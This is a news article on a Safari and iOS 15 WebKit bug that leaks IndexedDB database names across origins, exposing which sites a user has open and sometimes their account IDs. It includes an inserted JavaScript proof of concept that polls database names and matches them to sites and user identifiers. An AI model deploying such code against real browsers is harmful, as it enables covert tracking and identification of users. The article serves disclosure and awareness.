Safari and iOS users: Your browsing activity is being leaked in real time



For the past four months, Apple's Safari browser and its iOS and iPadOS operating systems have violated one of the Internet's most sacrosanct security policies. The bug leaks user identities and browsing activity to other websites in real time.

The same-origin policy restricts how a document or script loaded from one origin can interact with resources from another origin. Without it, a malicious site could read data belonging to a trusted site, including login credentials, while that site is open in a different browser window or tab.

Privacy violation.

Research published last week found that the policy has been broken since the release of Safari 15 and iOS and iPadOS 15. It is trivial for one site to learn which sites are open in other tabs and windows and, in some cases, the user IDs and other identifying information associated with those sites.

"The fact that database names leak across different origins is an obvious privacy violation," wrote Martin Bajanik, the researcher who found the bug. He continued:

It allows websites to know what websites the user visits in different tabs. This is possible because database names are unique. In some cases, websites use unique user-specific identifiers in their database names. This means that users can be identified.

The attack works in Safari 15 on Macs and, because Apple requires every browser on iOS and iPadOS to use its WebKit engine, in any browser on an iPhone or iPad running iOS 15 or iPadOS 15. A demo site, safarileaks.com, detects the presence of more than 20 popular websites in other tabs or windows. A real-world attacker could extend the list to hundreds or thousands of sites.

The leak also reveals identifying information in real time when a user is logged in to an affected site. The demo site can read the internal account identifier of an account that is logged in elsewhere in the browser, and such identifiers can usually be traced back to the account holder.

Raising awareness.

The leak stems from the way the WebKit browser engine implements IndexedDB, a browser API that lets a site store structured data on the user's device. Whenever a site creates or opens one of its databases, WebKit also creates an empty database with the same name in every other active frame, tab, and window in the same session. A malicious page running in a background tab or window can therefore enumerate the database names it sees over and over, and because those names are usually unique to a site, it learns which sites the user is visiting as they visit them.

An attacker need not wait for the victim to visit a target site. A malicious page can open the target in a pop-up window, or embed it in an iframe, to make that site interact with its databases and trigger the IndexedDB leak for that specific site.

Every time a website interacts with a database, a new empty database with the same name is created in all other active frames, tabs, and windows within the same browser session. Unless you switch to a different profile in Chrome or open a private window, windows and tabs usually share the same session.
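The following is an added example, not code from the article or from the researcher's demo site. It models the detection side of the leak described above: an attacker page repeatedly enumerates database names with the standard indexedDB.databases() API and matches them against a table of names that known sites create. The site names, database names and the user-ID pattern in SIGNATURES are constructed for illustration and describe no real site; the indexedDB object is injected so the same logic can be exercised offline in Node against a constructed stand-in.

```javascript
// Added example (not the article's or the demo site's code). Models how a page
// abusing the WebKit IndexedDB leak would turn enumerated database names into
// "site X is open, user Y is logged in" observations.

// Constructed signature table (assumption: these are not real sites' names).
// `userId` extracts an account identifier when a site embeds one in the
// database name, the pattern the article says makes logged-in users identifiable.
const SIGNATURES = [
  { site: 'mail.example',  test: (n) => n === 'ExampleMailStore' },
  { site: 'video.example', test: (n) => /^VideoCache-(\d{6,})$/.test(n),
    userId: (n) => n.match(/^VideoCache-(\d{6,})$/)[1] },
  { site: 'shop.example',  test: (n) => n.startsWith('shop-cart-') },
];

// Match one enumeration snapshot against the table. Returns one hit per
// matching database name; names not in the table are ignored.
function classify(dbNames, signatures = SIGNATURES) {
  const hits = [];
  for (const name of dbNames) {
    for (const sig of signatures) {
      if (!sig.test(name)) continue;
      hits.push({ site: sig.site, dbName: name,
                  userId: sig.userId ? sig.userId(name) : null });
    }
  }
  return hits;
}

// Fold a sequence of snapshots (what successive databases() calls returned)
// into the sites seen, in order of first appearance. A database that shows up
// in a later snapshot but not an earlier one was created by a site the user
// opened while we were polling, which is the "real time" part of the leak.
function collectLeaks(snapshots, signatures = SIGNATURES) {
  const firstSeen = new Map();
  snapshots.forEach((names, round) => {
    for (const hit of classify(names, signatures)) {
      if (!firstSeen.has(hit.dbName)) firstSeen.set(hit.dbName, { ...hit, round });
    }
  });
  return [...firstSeen.values()];
}

// Browser-side driver. `idb` is injected so this runs against window.indexedDB
// in an affected browser or against the stand-in below in Node.
// indexedDB.databases() resolves to an array of { name, version } objects.
async function pollLeakedDatabases(idb, { rounds = 10, intervalMs = 500,
                                          signatures = SIGNATURES } = {}) {
  const snapshots = [];
  for (let i = 0; i < rounds; i++) {
    const dbs = await idb.databases();
    snapshots.push(dbs.map((d) => d.name));
    if (i + 1 < rounds) await new Promise((r) => setTimeout(r, intervalMs));
  }
  return collectLeaks(snapshots, signatures);
}

// Stand-in for indexedDB in Node: each databases() call returns the next
// constructed snapshot, simulating other tabs creating databases over time.
function makeFakeIndexedDB(snapshots) {
  let call = 0;
  return {
    databases: async () =>
      snapshots[Math.min(call++, snapshots.length - 1)]
        .map((name, i) => ({ name, version: i + 1 })),
  };
}

// Constructed scenario: the victim has mail open, then logs in to video.example
// (whose database name embeds the account id) while the attacker page polls.
const DEMO_SNAPSHOTS = [
  ['attacker-own-db'],
  ['attacker-own-db', 'ExampleMailStore'],
  ['attacker-own-db', 'ExampleMailStore', 'VideoCache-20931177'],
];

if (typeof indexedDB === 'undefined') {
  pollLeakedDatabases(makeFakeIndexedDB(DEMO_SNAPSHOTS), { rounds: 3, intervalMs: 0 })
    .then((hits) => console.log(JSON.stringify(hits, null, 2)));
} else {
  // In an affected browser this reports databases created by other tabs.
  pollLeakedDatabases(indexedDB).then((hits) => console.log(hits));
}
```

Two things follow from the shape of this code. The visit half of the leak is a property of the browser and only a browser update removes it. The identity half, however, only exists because a site put an account identifier into its database name; a site that keeps a constant name and stores the identifier inside an object store still leaks the fact that it is open, but not who is logged in.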

How IndexedDB leaks your browsing activity in real time.

Bajanik said that he notified Apple of the vulnerability in late November, but as of publication it still hadn't been fixed in Safari or in either of the company's mobile OSes. Apple representatives didn't respond to an email asking when a patch would be released. As of Monday, Apple engineers had merged potential fixes into the WebKit source tree and marked Bajanik's report as resolved, but end users won't be protected until the WebKit fix ships in a browser or OS update.

Until then, Mac users can switch to a browser that doesn't use WebKit, but that isn't an option on iPhones and iPads, where every browser must use it. Some people might think there's little or no consequence to browsing activity being leaked, but the specific sites visited and the order in which they were accessed can say a lot about a person.

"Updating your browser or OS is the only real protection," Bajanik wrote. "We hope this article will raise awareness of this issue."